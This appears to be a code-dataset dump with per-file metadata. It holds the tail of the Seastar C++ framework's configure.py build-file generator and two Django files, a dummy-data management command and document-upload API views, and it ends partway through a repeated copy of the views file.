arg_parser.add_argument('--static-stdc++', dest = 'staticcxx', action = 'store_true',
help = 'Link libgcc and libstdc++ statically')
arg_parser.add_argument('--static-boost', dest = 'staticboost', action = 'store_true',
help = 'Link with boost statically')
add_tristate(arg_parser, name = 'hwloc', dest = 'hwloc', help = 'hwloc support')
arg_parser.add_argument('--enable-gcc6-concepts', dest='gcc6_concepts', action='store_true', default=False,
help='enable experimental support for C++ Concepts as implemented in GCC 6')
add_tristate(arg_parser, name = 'exception-scalability-workaround', dest='exception_workaround',
help='disabling override of dl_iterate_phdr symbol to workaround C++ exception scalability issues')
arg_parser.add_argument('--allocator-page-size', dest='allocator_page_size', type=int, help='override allocator page size')
args = arg_parser.parse_args()
libnet = [
'net/proxy.cc',
'net/virtio.cc',
'net/dpdk.cc',
'net/ip.cc',
'net/ethernet.cc',
'net/arp.cc',
'net/native-stack.cc',
'net/ip_checksum.cc',
'net/udp.cc',
'net/tcp.cc',
'net/dhcp.cc',
'net/tls.cc',
'net/dns.cc',
]
core = [
'core/reactor.cc',
'core/systemwide_memory_barrier.cc',
'core/fstream.cc',
'core/posix.cc',
'core/memory.cc',
'core/resource.cc',
'core/scollectd.cc',
'core/metrics.cc',
'core/app-template.cc',
'core/thread.cc',
'core/dpdk_rte.cc',
'core/fsqual.cc',
'util/conversions.cc',
'util/program-options.cc',
'util/log.cc',
'util/backtrace.cc',
'net/packet.cc',
'net/posix-stack.cc',
'net/net.cc',
'net/stack.cc',
'net/inet_address.cc',
'rpc/rpc.cc',
'rpc/lz4_compressor.cc',
'core/exception_hacks.cc',
]
protobuf = [
'proto/metrics2.proto',
]
http = ['http/transformers.cc',
'http/json_path.cc',
'http/file_handler.cc',
'http/common.cc',
'http/routes.cc',
'json/json_elements.cc',
'json/formatter.cc',
'http/matcher.cc',
'http/mime_types.cc',
'http/httpd.cc',
'http/reply.cc',
'http/request_parser.rl',
'http/api_docs.cc',
]
boost_test_lib = [
'tests/test-utils.cc',
'tests/test_runner.cc',
]
def maybe_static(flag, libs):
if flag and not args.static:
libs = '-Wl,-Bstatic {} -Wl,-Bdynamic'.format(libs)
return libs
defines = ['FMT_HEADER_ONLY']
libs = ' '.join(['-laio',
maybe_static(args.staticboost,
'-lboost_program_options -lboost_system -lboost_filesystem'),
'-lstdc++ -lm',
maybe_static(args.staticboost, '-lboost_thread'),
'-lcryptopp -lrt -lgnutls -lgnutlsxx -llz4 -lprotobuf -ldl -lgcc_s -lunwind',
])
boost_unit_test_lib = maybe_static(args.staticboost, '-lboost_unit_test_framework')
hwloc_libs = '-lhwloc -lnuma -lpciaccess -lxml2 -lz'
if args.gcc6_concepts:
defines.append('HAVE_GCC6_CONCEPTS')
args.user_cflags += ' -fconcepts'
if not apply_tristate(args.exception_workaround, test = lambda: not args.staticcxx and not args.static,
note = "Note: disabling exception scalability workaround due to static linkage of libgcc and libstdc++",
missing = "Error: cannot enable exception scalability workaround with static linkage of libgcc and libstdc++"):
defines.append('NO_EXCEPTION_HACK')
if args.staticcxx:
libs = libs.replace('-lstdc++', '')
libs += ' -static-libgcc -static-libstdc++'
if args.staticcxx or args.static:
defines.append("NO_EXCEPTION_INTERCEPT");
memcache_base = [
'apps/memcached/ascii.rl'
] + libnet + core
deps = {
'libseastar.a' : core + libnet + http,
'seastar.pc': [],
'apps/httpd/httpd': ['apps/httpd/demo.json', 'apps/httpd/main.cc'] + http + libnet + core,
'apps/memcached/memcached': ['apps/memcached/memcache.cc'] + memcache_base,
'tests/memcached/test_ascii_parser': ['tests/memcached/test_ascii_parser.cc'] + memcache_base,
'tests/fileiotest': ['tests/fileiotest.cc'] + core,
'tests/directory_test': ['tests/directory_test.cc'] + core,
'tests/linecount': ['tests/linecount.cc'] + core,
'tests/echotest': ['tests/echotest.cc'] + core + libnet,
'tests/l3_test': ['tests/l3_test.cc'] + core + libnet,
'tests/ip_test': ['tests/ip_test.cc'] + core + libnet,
'tests/tcp_test': ['tests/tcp_test.cc'] + core + libnet,
'tests/timertest': ['tests/timertest.cc'] + core,
'tests/futures_test': ['tests/futures_test.cc'] + core,
'tests/alloc_test': ['tests/alloc_test.cc'] + core,
'tests/foreign_ptr_test': ['tests/foreign_ptr_test.cc'] + core,
'tests/semaphore_test': ['tests/semaphore_test.cc'] + core,
'tests/expiring_fifo_test': ['tests/expiring_fifo_test.cc'] + core,
'tests/smp_test': ['tests/smp_test.cc'] + core,
'tests/thread_test': ['tests/thread_test.cc'] + core,
'tests/thread_context_switch': ['tests/thread_context_switch.cc'] + core,
'tests/udp_server': ['tests/udp_server.cc'] + core + libnet,
'tests/udp_client': ['tests/udp_client.cc'] + core + libnet,
'tests/tcp_sctp_server': ['tests/tcp_sctp_server.cc'] + core + libnet,
'tests/tcp_sctp_client': ['tests/tcp_sctp_client.cc'] + core + libnet,
'tests/tls_test': ['tests/tls_test.cc'] + core + libnet,
'tests/fair_queue_test': ['tests/fair_queue_test.cc'] + core,
'apps/seawreck/seawreck': ['apps/seawreck/seawreck.cc', 'http/http_response_parser.rl'] + core + libnet,
'apps/fair_queue_tester/fair_queue_tester': ['apps/fair_queue_tester/fair_queue_tester.cc'] + core,
'apps/iotune/iotune': ['apps/iotune/iotune.cc'] + ['core/resource.cc', 'core/fsqual.cc'],
'tests/blkdiscard_test': ['tests/blkdiscard_test.cc'] + core,
'tests/sstring_test': ['tests/sstring_test.cc'] + core,
'tests/unwind_test': ['tests/unwind_test.cc'] + core,
'tests/defer_test': ['tests/defer_test.cc'] + core,
'tests/httpd': ['tests/httpd.cc'] + http + core,
'tests/allocator_test': ['tests/allocator_test.cc'] + core,
'tests/output_stream_test': ['tests/output_stream_test.cc'] + core + libnet,
'tests/udp_zero_copy': ['tests/udp_zero_copy.cc'] + core + libnet,
'tests/shared_ptr_test': ['tests/shared_ptr_test.cc'] + core,
'tests/weak_ptr_test': ['tests/weak_ptr_test.cc'] + core,
'tests/checked_ptr_test': ['tests/checked_ptr_test.cc'] + core,
'tests/slab_test': ['tests/slab_test.cc'] + core,
'tests/fstream_test': ['tests/fstream_test.cc'] + core,
'tests/distributed_test': ['tests/distributed_test.cc'] + core,
'tests/rpc': ['tests/rpc.cc'] + core + libnet,
'tests/rpc_test': ['tests/rpc_test.cc'] + core + libnet,
'tests/packet_test': ['tests/packet_test.cc'] + core + libnet,
'tests/connect_test': ['tests/connect_test.cc'] + core + libnet,
'tests/chunked_fifo_test': ['tests/chunked_fifo_test.cc'] + core,
'tests/circular_buffer_test': ['tests/circular_buffer_test.cc'] + core,
'tests/perf/perf_fstream': ['tests/perf/perf_fstream.cc'] + core,
'tests/json_formatter_test': ['tests/json_formatter_test.cc'] + core + http,
'tests/dns_test': ['tests/dns_test.cc'] + core + libnet,
'tests/execution_stage_test': ['tests/execution_stage_test.cc'] + core,
'tests/lowres_clock_test': ['tests/lowres_clock_test.cc'] + core,
'tests/program_options_test': ['tests/program_options_test.cc'] + core,
'tests/tuple_utils_test': ['tests/tuple_utils_test.cc'],
'tests/tls_echo_server': ['tests/tls_echo_server.cc'] + core + libnet,
'tests/tls_simple_client': ['tests/tls_simple_client.cc'] + core + libnet,
'tests/circular_buffer_fixed_capacity_test': ['tests/circular_buffer_fixed_capacity_test.cc'],
'tests/scheduling_group_demo': ['tests/scheduling_group_demo.cc'] + core,
'tests/noncopyable_function_test': ['tests/noncopyable_function_test.cc'],
}
boost_tests = [
'tests/memcached/test_ascii_parser',
'tests/fileiotest',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/thread_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/httpd',
'tests/output_stream_test',
'tests/fstream_test',
'tests/rpc_test',
'tests/connect_test',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
]
for bt in boost_tests:
deps[bt] += boost_test_lib
warnings = [
'-Wno-mismatched-tags',
'-Wno-pessimizing-move',
'-Wno-redundant-move',
'-Wno-inconsistent-missing-override',
'-Wno-unused-private-field',
'-Wno-unknown-attributes',
'-Wno-unneeded-internal-declaration',
'-Wno-undefined-inline',
'-Wno-overloaded-virtual',
'-Wno-maybe-uninitialized',
'-Wno-sign-compare',
]
if args.with_osv:
args.so = True
args.hwloc = False
args.user_cflags = (args.user_cflags +
' -DDEFAULT_ALLOCATOR -fvisibility=default -DHAVE_OSV -I' +
args.with_osv + ' -I' + args.with_osv + '/include -I' +
args.with_osv + '/arch/x64')
if args.allocator_page_size:
args.user_cflags += ' -DSEASTAR_OVERRIDE_ALLOCATOR_PAGE_SIZE=' + str(args.allocator_page_size)
dpdk_arch_xlat = {
'native': 'native',
'nehalem': 'nhm',
'westmere': 'wsm',
'sandybridge': 'snb',
'ivybridge': 'ivb',
}
dpdk_machine = 'native'
if args.dpdk:
if not os.path.exists('dpdk') or not os.listdir('dpdk'):
raise Exception('--enable-dpdk: dpdk/ is empty. Run "git submodule update --init".')
cflags = args.user_cflags.split()
dpdk_machine = ([dpdk_arch_xlat[cflag[7:]]
for cflag in cflags
if cflag.startswith('-march')] or ['native'])[0]
subprocess.check_call('make -C dpdk RTE_OUTPUT=$PWD/build/dpdk/ config T=x86_64-native-linuxapp-gcc'.format(
dpdk_machine=dpdk_machine),
shell = True)
dotconfig = 'build/dpdk/.config'
lines = open(dotconfig, encoding='UTF-8').readlines()
def update(lines, vars):
ret = []
for line in lines:
for var, val in vars.items():
if line.startswith(var + '='):
line = var + '=' + val + '\n'
ret.append(line)
return ret
lines = update(lines, {'CONFIG_RTE_LIBRTE_PMD_BOND': 'n',
'CONFIG_RTE_MBUF_SCATTER_GATHER': 'n',
'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
'CONFIG_RTE_APP_TEST': 'n',
'CONFIG_RTE_TEST_PMD': 'n',
'CONFIG_RTE_MBUF_REFCNT_ATOMIC': 'n',
'CONFIG_RTE_MAX_MEMSEG': '8192',
'CONFIG_RTE_EAL_IGB_UIO': 'n',
'CONFIG_RTE_LIBRTE_KNI': 'n',
'CONFIG_RTE_KNI_KMOD': 'n',
'CONFIG_RTE_LIBRTE_JOBSTATS': 'n',
'CONFIG_RTE_LIBRTE_LPM': 'n',
'CONFIG_RTE_LIBRTE_ACL': 'n',
'CONFIG_RTE_LIBRTE_POWER': 'n',
'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
'CONFIG_RTE_LIBRTE_METER': 'n',
'CONFIG_RTE_LIBRTE_SCHED': 'n',
'CONFIG_RTE_LIBRTE_DISTRIBUTOR': 'n',
'CONFIG_RTE_LIBRTE_PMD_CRYPTO_SCHEDULER': 'n',
'CONFIG_RTE_LIBRTE_REORDER': 'n',
'CONFIG_RTE_LIBRTE_PORT': 'n',
'CONFIG_RTE_LIBRTE_TABLE': 'n',
'CONFIG_RTE_LIBRTE_PIPELINE': 'n',
})
lines += 'CONFIG_RTE_MACHINE={}'.format(dpdk_machine)
open(dotconfig, 'w', encoding='UTF-8').writelines(lines)
args.dpdk_target = os.getcwd() + '/build/dpdk'
if args.dpdk_target:
args.user_cflags = (args.user_cflags +
' -DHAVE_DPDK -I' + args.dpdk_target + '/include ' +
dpdk_cflags(args.dpdk_target) +
' -Wno-error=literal-suffix -Wno-literal-suffix -Wno-invalid-offsetof')
libs += (' -L' + args.dpdk_target + '/lib ')
if args.with_osv:
libs += '-lintel_dpdk -lrt -lm -ldl'
else:
libs += '-Wl,--whole-archive -lrte_pmd_vmxnet3_uio -lrte_pmd_i40e -lrte_pmd_ixgbe -lrte_pmd_e1000 -lrte_pmd_ring -lrte_pmd_bnxt -lrte_pmd_cxgbe -lrte_pmd_ena -lrte_pmd_enic -lrte_pmd_fm10k -lrte_pmd_nfp -lrte_pmd_qede -lrte_pmd_sfc_efx -lrte_hash -lrte_kvargs -lrte_mbuf -lrte_ethdev -lrte_eal -lrte_mempool -lrte_mempool_ring -lrte_ring -lrte_cmdline -lrte_cfgfile -Wl,--no-whole-archive -lrt -lm -ldl'
args.user_cflags += ' -I{srcdir}/fmt'.format(**globals())
if not args.staticboost:
args.user_cflags += ' -DBOOST_TEST_DYN_LINK'
warnings = [w
for w in warnings
if warning_supported(warning = w, compiler = args.cxx)]
warnings = ' '.join(warnings)
dbgflag = debug_flag(args.cxx) if args.debuginfo else ''
tests_link_rule = 'link' if args.tests_debuginfo else 'link_stripped'
sanitize_flags = sanitize_vptr_flag(args.cxx)
visibility_flags = adjust_visibility_flags(args.cxx)
visibility_flags = '-fvisibility=hidden ' + visibility_flags
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>'):
print('Seastar requires gnutls. Install gnutls-devel/libgnutls-dev')
sys.exit(1)
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>\nint x = GNUTLS_NONBLOCK;'):
print('Seastar requires gnutls >= 2.8. Install libgnutls28-dev or later.')
sys.exit(1)
if not try_compile(args.cxx, '#include <experimental/string_view>', ['-std=gnu++1y']):
print('Seastar requires g++ >= 4.9. Install g++-4.9 or later (use --compiler option).')
sys.exit(1)
if not try_compile(args.cxx, '''#include <boost/version.hpp>\n\
#if BOOST_VERSION < 105500\n\
#error "Invalid boost version"\n\
#endif'''):
print("Seastar requires boost >= 1.55")
sys.exit(1)
modes['debug']['sanitize'] += ' ' + sanitize_flags
def have_hwloc():
return try_compile(compiler = args.cxx, source = '#include <hwloc.h>\n#include <numa.h>')
if apply_tristate(args.hwloc, test = have_hwloc,
note = 'Note: hwloc-devel/numactl-devel not installed. No NUMA support.',
missing = 'Error: required packages hwloc-devel/numactl-devel not installed.'):
libs += ' ' + hwloc_libs
defines.append('HAVE_HWLOC')
defines.append('HAVE_NUMA')
if try_compile(args.cxx, source = textwrap.dedent('''\
#include <lz4.h>
void m() {
LZ4_compress_default(static_cast<const char*>(0), static_cast<char*>(0), 0, 0);
}
''')):
defines.append("HAVE_LZ4_COMPRESS_DEFAULT")
if try_compile_and_link(args.cxx, flags=['-fsanitize=address'], source = textwrap.dedent('''\
#include <cstddef>
extern "C" {
void __sanitizer_start_switch_fiber(void**, const void*, size_t);
void __sanitizer_finish_switch_fiber(void*, const void**, size_t*);
}
int main() {
__sanitizer_start_switch_fiber(nullptr, nullptr, 0);
__sanitizer_finish_switch_fiber(nullptr, nullptr, nullptr);
}
''')):
defines.append("HAVE_ASAN_FIBER_SUPPORT")
if args.embedded_static:
args.pie = ''
args.fpie = '-fPIC'
visibility_flags = visibility_flags.replace('-fvisibility=hidden ', '')
modes[args.mode]['cares_opts'] += ' -DCMAKE_C_FLAGS=-fPIC'
elif args.so:
args.pie = '-shared'
args.fpie = '-fpic'
elif args.pie:
args.pie = '-pie'
args.fpie = '-fpie'
else:
args.pie = ''
args.fpie = ''
defines = ' '.join(['-D' + d for d in defines])
globals().update(vars(args))
total_memory = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES')
link_pool_depth = max(int(total_memory / 7e9), 1)
build_modes = modes if args.mode == 'all' else [args.mode]
build_artifacts = all_artifacts if not args.artifacts else args.artifacts
dpdk_sources = []
if args.dpdk:
for root, dirs, files in os.walk('dpdk'):
dpdk_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
dpdk_sources = ' '.join(dpdk_sources)
cares_dir = 'c-ares'
cares_lib = 'cares-seastar'
cares_src_lib = cares_dir + '/lib/libcares.a'
if not os.path.exists(cares_dir) or not os.listdir(cares_dir):
raise Exception(cares_dir + ' is empty. Run "git submodule update --init".')
cares_sources = []
for root, dirs, files in os.walk('c-ares'):
cares_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
cares_sources = ' '.join(cares_sources)
libs += ' -l' + cares_lib
# of libraries which are targets built here. These libraries are all relative
# to the current mode's build directory.
built_libs = []
built_libs += ['lib' + cares_lib + '.a']
outdir = 'build'
buildfile = 'build.ninja'
os.makedirs(outdir, exist_ok = True)
do_sanitize = True
if args.static:
do_sanitize = False
with open(buildfile, 'w') as f:
dpdk_deps = ''
if args.dpdk:
dpdk_deps = ' {dpdk_target}/include/rte_eal.h {dpdk_target}/lib/librte_eal.a'.format(dpdk_target=args.dpdk_target)
f.write(textwrap.dedent('''\
configure_args = {configure_args}
builddir = {outdir}
full_builddir = {srcdir}/$builddir
cxx = {cxx}
# we disable _FORTIFY_SOURCE because it generates false positives with longjmp() (core/thread.cc)
cxxflags = -std=gnu++1y {dbgflag} {fpie} -Wall -Wno-unused-variable -Wno-unused-but-set-variable -Wno-error=deprecated-declarations {visibility_flags} -pthread -I{srcdir} -U_FORTIFY_SOURCE {user_cflags} {warnings} {defines}
ldflags = {dbgflag} -Wl,--no-as-needed {static} {pie} {visibility_flags} -pthread {user_ldflags}
libs = {libs}
pool link_pool
depth = {link_pool_depth}
rule ragel
# sed away a bug in ragel 7 that emits some extraneous _nfa* variables
# (the $$ is collapsed to a single one by ninja)
command = ragel -G2 -o $out $in && sed -i -e '1h;2,$$H;$$!d;g' -re 's/static const char _nfa[^;]*;//g' $out
description = RAGEL $out
rule gen
command = /bin/echo -e $text > $out
description = GEN $out
rule swagger
command = json/json2code.py -f $in -o $out
description = SWAGGER $out
rule protobuf
command = protoc --cpp_out=$outdir $in
description = PROTOC $out
rule copy_file
command = cp $in $out
''').format(**globals()))
if args.dpdk:
f.write(textwrap.dedent('''\
rule dpdkmake
command = make -C build/dpdk CC={args.cc}
build {dpdk_deps} : dpdkmake {dpdk_sources}
''').format(**globals()))
for mode in build_modes:
objdeps = {}
modeval = modes[mode]
if modeval['sanitize'] and not do_sanitize:
print('Note: --static disables debug mode sanitizers')
modeval['sanitize'] = ''
modeval['sanitize_libs'] = ''
elif modeval['sanitize']:
modeval['sanitize'] += ' -DASAN_ENABLED'
f.write(textwrap.dedent('''\
cxxflags_{mode} = {sanitize} {opt} -I$full_builddir/{mode}/gen -I$full_builddir/{mode}/c-ares
libs_{mode} = {sanitize_libs} {libs}
rule cxx.{mode}
command = $cxx -MD -MT $out -MF $out.d $cxxflags_{mode} $cxxflags -c -o $out $in
description = CXX $out
depfile = $out.d
rule link.{mode}
command = $cxx $cxxflags_{mode} -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK $out
pool = link_pool
rule link_stripped.{mode}
command = $cxx $cxxflags_{mode} -s -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK (stripped) $out
pool = link_pool
rule ar.{mode}
command = rm -f $out; ar cr $out $in; ranlib $out
description = AR $out
''').format(mode = mode, **modeval))
f.write('build {mode}: phony $builddir/{mode}/lib{cares_lib}.a {artifacts}\n'.format(mode = mode, cares_lib=cares_lib,
artifacts = str.join(' ', ('$builddir/' + mode + '/' + x for x in build_artifacts))))
f.write(textwrap.dedent('''\
rule caresmake_{mode}
command = make -C build/{mode}/{cares_dir} CC={args.cc}
rule carescmake_{mode}
command = mkdir -p $builddir/{mode}/{cares_dir} && cd $builddir/{mode}/{cares_dir} && CC={args.cc} cmake {cares_opts} {srcdir}/$in
build $builddir/{mode}/{cares_dir}/Makefile : carescmake_{mode} {cares_dir}
build $builddir/{mode}/{cares_dir}/ares_build.h : phony $builddir/{mode}/{cares_dir}/Makefile
build $builddir/{mode}/{cares_src_lib} : caresmake_{mode} $builddir/{mode}/{cares_dir}/Makefile | {cares_sources}
build $builddir/{mode}/lib{cares_lib}.a : copy_file $builddir/{mode}/{cares_src_lib}
''').format(cares_opts=(modeval['cares_opts']), **globals()))
objdeps['$builddir/' + mode + '/net/dns.o'] = ' $builddir/' + mode + '/' + cares_dir + '/ares_build.h'
compiles = {}
ragels = {}
swaggers = {}
protobufs = {}
for binary in build_artifacts:
srcs = deps[binary]
objs = ['$builddir/' + mode + '/' + src.replace('.cc', '.o')
for src in srcs
if src.endswith('.cc')]
objs += ['$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.o')
for src in srcs
if src.endswith('.proto')]
if binary.endswith('.pc'):
vars = modeval.copy()
vars.update(globals())
pc = textwrap.dedent('''\
Name: Seastar
URL: http://seastar-project.org/
Description: Advanced C++ framework for high-performance server applications on modern hardware.
Version: 1.0
Libs: -L$full_builddir/{mode} -Wl,--whole-archive,-lseastar,--no-whole-archive $cxxflags $cxflags_{mode} -Wl,--no-as-needed {static} {pie} {user_ldflags} {sanitize_libs} {libs}
Cflags: $cxxflags $cxxflags_{mode}
''').format(**vars)
f.write('build $builddir/{}/{}: gen\n text = {}\n'.format(mode, binary, repr(pc)))
elif binary.endswith('.a'):
f.write('build $builddir/{}/{}: ar.{} {}\n'.format(mode, binary, mode, str.join(' ', objs)))
else:
libdeps = str.join(' ', ('$builddir/{}/{}'.format(mode, i) for i in built_libs))
extralibs = []
if binary.startswith('tests/'):
if binary in boost_tests:
extralibs += [maybe_static(args.staticboost, '-lboost_unit_test_framework')]
# by many tests yields ridiculous amounts of disk space.
# So we strip the tests by default; The user can very
# quickly re-link the test unstripped by adding a "_g"
# to the test name, e.g., "ninja build/release/testname_g"
f.write('build $builddir/{}/{}: {}.{} {} | {} {}\n'.format(mode, binary, tests_link_rule, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
f.write('build $builddir/{}/{}_g: link.{} {} | {} {}\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
else:
f.write('build $builddir/{}/{}: link.{} {} | {} {} $builddir/{}/lib{}.a\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps, mode, cares_lib))
for src in srcs:
if src.endswith('.cc'):
obj = '$builddir/' + mode + '/' + src.replace('.cc', '.o')
compiles[obj] = src
elif src.endswith('.proto'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.h')
protobufs[hh] = src
compiles[hh.replace('.h', '.o')] = hh.replace('.h', '.cc')
elif src.endswith('.rl'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.rl', '.hh')
ragels[hh] = src
elif src.endswith('.json'):
hh = '$builddir/' + mode + '/gen/' + src + '.hh'
swaggers[hh] = src
else:
raise Exception('No rule for ' + src)
for obj in compiles:
src = compiles[obj]
gen_headers = list(ragels.keys()) + list(swaggers.keys()) + list(protobufs.keys())
f.write('build {}: cxx.{} {} || {} \n'.format(obj, mode, src, ' '.join(gen_headers) + dpdk_deps + objdeps.get(obj, '')))
for hh in ragels:
src = ragels[hh]
f.write('build {}: ragel {}\n'.format(hh, src))
for hh in swaggers:
src = swaggers[hh]
f.write('build {}: swagger {} | json/json2code.py\n'.format(hh,src))
for pb in protobufs:
src = protobufs[pb]
c_pb = pb.replace('.h','.cc')
outd = os.path.dirname(os.path.dirname(pb))
f.write('build {} {}: protobuf {}\n outdir = {}\n'.format(c_pb, pb, src, outd))
f.write(textwrap.dedent('''\
rule configure
command = python3 configure.py $configure_args
generator = 1
build build.ninja: configure | configure.py
rule cscope
command = find -name '*.[chS]' -o -name "*.cc" -o -name "*.hh" | cscope -bq -i-
description = CSCOPE
build cscope: cscope
rule md2html
command = pandoc --self-contained --toc -c doc/template.css -V documentclass=report --chapters --number-sections -f markdown_github+pandoc_title_block --highlight-style tango $in -o $out
description = PANDOC $out
rule md2pdf
command = pandoc -f markdown_github+pandoc_title_block --highlight-style tango --template=doc/template.tex $in -o $out
description = PANDOC $out
build doc/tutorial.html: md2html doc/tutorial.md
build doc/tutorial.pdf: md2pdf doc/tutorial.md
default {modes_list}
''').format(modes_list = ' '.join(build_modes), **globals()))
| true | true |
f725e0913b22178375a220d288839fa6706545f3 | 520 | py | Python | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | 1 | 2022-01-28T18:20:19.000Z | 2022-01-28T18:20:19.000Z | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | backend/utils/management/commands/generate_dummy_skills.py | NumanIbnMazid/numanibnmazid.com | 905e3afab285316d88bafa30dc080dfbb0611731 | [
"MIT"
] | null | null | null | from portfolios.factories.skill_factory import create_skills_with_factory
from django.db import transaction
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Generates dummy data"
def _generate_dummy_data(self):
# Create dummy data
create_skills_with_factory(
num_of_data=7,
delete_old_data=False
)
@transaction.atomic
def handle(self, *args, **kwargs):
# generate data
self._generate_dummy_data()
| 26 | 73 | 0.698077 | from portfolios.factories.skill_factory import create_skills_with_factory
from django.db import transaction
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = "Generates dummy data"
def _generate_dummy_data(self):
create_skills_with_factory(
num_of_data=7,
delete_old_data=False
)
@transaction.atomic
def handle(self, *args, **kwargs):
self._generate_dummy_data()
| true | true |
f725e110043f228bbfec7d077af9fa005de2f6e4 | 3,844 | py | Python | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | api/applications/views/documents.py | django-doctor/lite-api | 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse
from rest_framework import status
from rest_framework.views import APIView
from api.applications.libraries.document_helpers import (
upload_application_document,
delete_application_document,
get_application_document,
upload_goods_type_document,
delete_goods_type_document,
get_goods_type_document,
)
from api.applications.libraries.get_applications import get_application
from api.applications.models import ApplicationDocument
from api.applications.serializers.document import ApplicationDocumentSerializer
from api.cases.enums import CaseTypeSubTypeEnum
from api.core.authentication import ExporterAuthentication
from api.core.decorators import (
authorised_to_view_application,
allowed_application_types,
application_in_state,
)
from api.goodstype.helpers import get_goods_type
from api.users.models import ExporterUser
class ApplicationDocumentView(APIView):
"""
Retrieve or add document to an application
"""
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk):
"""
View all additional documents on an application
"""
application = get_application(pk)
documents = ApplicationDocumentSerializer(ApplicationDocument.objects.filter(application_id=pk), many=True).data
return JsonResponse({"documents": documents, "editable": application.is_major_editable()})
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def post(self, request, pk):
"""
Upload additional document onto an application
"""
application = get_application(pk)
return upload_application_document(application, request.data, request.user)
class ApplicationDocumentDetailView(APIView):
"""
Retrieve or delete a document from an application
"""
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, doc_pk):
"""
View an additional document on an application
"""
return get_application_document(doc_pk)
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def delete(self, request, pk, doc_pk):
"""
Delete an additional document on an application
"""
application = get_application(pk)
return delete_application_document(doc_pk, application, request.user)
class GoodsTypeDocumentView(APIView):
"""
Retrieve, add or delete a third party document from an application
"""
authentication_classes = (ExporterAuthentication,)
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return get_goods_type_document(goods_type)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@application_in_state(is_major_editable=True)
@authorised_to_view_application(ExporterUser)
def post(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return upload_goods_type_document(goods_type, request.data)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def delete(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
if not goods_type:
return JsonResponse(data={"error": "No such goods type"}, status=status.HTTP_400_BAD_REQUEST)
return delete_goods_type_document(goods_type)
| 34.630631 | 120 | 0.751821 | from django.db import transaction
from django.http import JsonResponse
from rest_framework import status
from rest_framework.views import APIView
from api.applications.libraries.document_helpers import (
upload_application_document,
delete_application_document,
get_application_document,
upload_goods_type_document,
delete_goods_type_document,
get_goods_type_document,
)
from api.applications.libraries.get_applications import get_application
from api.applications.models import ApplicationDocument
from api.applications.serializers.document import ApplicationDocumentSerializer
from api.cases.enums import CaseTypeSubTypeEnum
from api.core.authentication import ExporterAuthentication
from api.core.decorators import (
authorised_to_view_application,
allowed_application_types,
application_in_state,
)
from api.goodstype.helpers import get_goods_type
from api.users.models import ExporterUser
class ApplicationDocumentView(APIView):
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk):
application = get_application(pk)
documents = ApplicationDocumentSerializer(ApplicationDocument.objects.filter(application_id=pk), many=True).data
return JsonResponse({"documents": documents, "editable": application.is_major_editable()})
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def post(self, request, pk):
application = get_application(pk)
return upload_application_document(application, request.data, request.user)
class ApplicationDocumentDetailView(APIView):
authentication_classes = (ExporterAuthentication,)
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, doc_pk):
return get_application_document(doc_pk)
@transaction.atomic
@authorised_to_view_application(ExporterUser)
@application_in_state(is_editable=True)
def delete(self, request, pk, doc_pk):
application = get_application(pk)
return delete_application_document(doc_pk, application, request.user)
class GoodsTypeDocumentView(APIView):
authentication_classes = (ExporterAuthentication,)
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
@authorised_to_view_application(ExporterUser)
def get(self, request, pk, goods_type_pk):
goods_type = get_goods_type(goods_type_pk)
return get_goods_type_document(goods_type)
@transaction.atomic
@allowed_application_types([CaseTypeSubTypeEnum.HMRC])
